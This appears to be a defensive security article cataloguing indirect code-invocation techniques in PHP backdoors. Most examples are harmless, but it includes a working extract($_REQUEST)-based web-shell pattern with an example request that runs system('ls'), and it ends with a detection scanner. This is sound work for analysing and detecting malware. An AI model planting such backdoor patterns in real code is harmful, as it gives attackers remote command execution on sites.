Implicit PHP code invocation methods used in malicious scripts

    While cleaning up infected sites, we come across many varieties of hacker shells and backdoors. The scripts differ in functionality and in how the source code is obfuscated, but they all have one thing in common: implicit declaration of variables and functions, and indirect function calls.

    This approach is popular among malicious code developers because, on the one hand, it significantly complicates analysis of the source code and, on the other hand, it allows code to be stored as text data. For example, part of the malicious code can be downloaded from a third-party site, read from a database or from jpeg/png/gif metadata, or passed in a request to the script. In addition, code that is kept as a plain text string can easily be encrypted.

    Incidentally, web developers use the same methods for legitimate purposes in scripts that check license keys and register web applications, to make software products harder to crack.

    Despite all the variety of malicious code, there are not many ways to declare and indirectly call functions. Below are examples of various techniques for invoking code invisibly. For simplicity and clarity, let the "malicious code" be represented by the call

    echo "Test";

    which displays the word "Test" on the page. Naturally, in real shells and backdoors the names of variables and functions, as well as the executable code, are not stored in the open and in most cases are obfuscated.



    Option 1: indirect function call (the function name is held in a string and called through a variable)

    <?php
        $a = "var_dump";
        $b = "Test";
        $a($b);   // calls var_dump("Test")
    ?>


    Option 2: code execution through eval

    <?php
        eval('$a = "Test"; echo $a;');
    ?>


    Option 3: code execution through assert (a string argument to assert() is evaluated as code only in PHP 7 and earlier; since PHP 8.0 it is no longer executed)

    <?php
        assert('print("Test")');
    ?>


    Option 4: code execution via array_map

    <?php
        function evil($a) {
            echo $a;
        }
        array_map('evil', array("Test"));
    ?>


    Option 5: code execution through preg_replace('/.*/e') (the /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0)

    <?php
        preg_replace('/.*/e', 'print("Test")', '');
    ?>


    Option 6: code execution through preg_replace_callback

    <?php
        $a = function() { echo "Test"; };
        preg_replace_callback('/.*/', $a, '');
    ?>


    Option 7: code execution through usort, uasort, uksort

    <?php
        $a = function($x, $y) { echo "Test"; };
        $b = array(1 => '1', 2 => '2');
        usort($b, $a);
    ?>


    Option 8: hidden function declaration and parameter passing through extract (the request parameters become variables, so the caller chooses both the function and its argument)

    <?php
        extract($_REQUEST);
        $a($b);
    ?>


    A request to site.ru/script.php?a=system&b=ls will execute system("ls").

    Option 9: registering a shutdown function (call exit() or die() to trigger it immediately; note that create_function() was removed in PHP 8.0)

    <?php
        register_shutdown_function(create_function('', "echo 'Test';"));
    ?>


    The same approach works with any call that takes a callable as an argument: call_user_func_array(), call_user_func(), forward_static_call_array(), forward_static_call(), register_tick_function(). However, in real shells and backdoors we did not encounter calls through these functions; options 1 through 8 are what is usually used.

    In real backdoors the listed options are used in combination, and the declarations of variables and functions are often moved outside the script (for example, loaded from the database, from a remote server, or from image metadata).
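    As an added example (not code from the original article), the following PHP script uses the tokenizer to flag the patterns listed above in a source file: variable function calls, eval, and calls to the string- and callback-executing functions, including preg_replace() patterns that carry the /e modifier. The sample input is constructed, and the names scan_php and SUSPECT_FUNCS are chosen here.

```php
<?php
// Constructed sample combining several of the options above (not a real shell).
$sample = <<<'PHP'
<?php
extract($_REQUEST);
$a($b);
preg_replace('/.*/e', 'print("Test")', '');
register_shutdown_function(create_function('', "echo 'Test';"));
PHP;

// Functions that execute a string or a supplied callable (options 2 to 9).
const SUSPECT_FUNCS = ['assert', 'create_function', 'extract', 'array_map',
    'preg_replace_callback', 'usort', 'uasort', 'uksort',
    'register_shutdown_function', 'register_tick_function', 'call_user_func',
    'call_user_func_array', 'forward_static_call', 'forward_static_call_array'];

// Tokenizer-based scan: reports $x(...) calls, eval, calls to SUSPECT_FUNCS and /e patterns.
function scan_php(string $src): array {
    $hits = [];
    $tokens = token_get_all($src);
    $n = count($tokens);
    for ($i = 0; $i < $n; $i++) {
        $t = $tokens[$i];
        if (!is_array($t)) continue;            // single-character tokens such as ';'
        $j = $i + 1;                            // next significant token: is this being called?
        while ($j < $n && is_array($tokens[$j]) && $tokens[$j][0] === T_WHITESPACE) $j++;
        $called = $j < $n && $tokens[$j] === '(';
        $name = strtolower($t[1]);
        if ($t[0] === T_VARIABLE && $called) {
            $hits[] = sprintf('line %d: variable function call %s()', $t[2], $t[1]);
        } elseif ($t[0] === T_EVAL || ($t[0] === T_STRING && $called && in_array($name, SUSPECT_FUNCS, true))) {
            $hits[] = sprintf('line %d: call to %s()', $t[2], $t[1]);
        } elseif ($t[0] === T_STRING && $called && $name === 'preg_replace') {
            // Inspect the pattern literal for an /e modifier (assumes a non-bracket delimiter).
            $k = $j + 1;
            while ($k < $n && is_array($tokens[$k]) && $tokens[$k][0] === T_WHITESPACE) $k++;
            if ($k < $n && is_array($tokens[$k]) && $tokens[$k][0] === T_CONSTANT_ENCAPSED_STRING) {
                $pat = trim($tokens[$k][1], '\'"');
                $end = strlen($pat) > 1 ? strrpos($pat, $pat[0], 1) : false;
                if ($end !== false && strpos(substr($pat, $end + 1), 'e') !== false) {
                    $hits[] = sprintf('line %d: preg_replace() with /e modifier', $t[2]);
                }
            }
        }
    }
    return $hits;
}

foreach (scan_php($sample) as $hit) echo $hit, "\n";
```

    On the constructed sample the scan reports extract() on line 2, the variable call $a() on line 3, the /e pattern on line 4, and register_shutdown_function() and create_function() on line 5; it only tokenizes the input, so it runs on current PHP versions even when the flagged constructs themselves no longer work.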
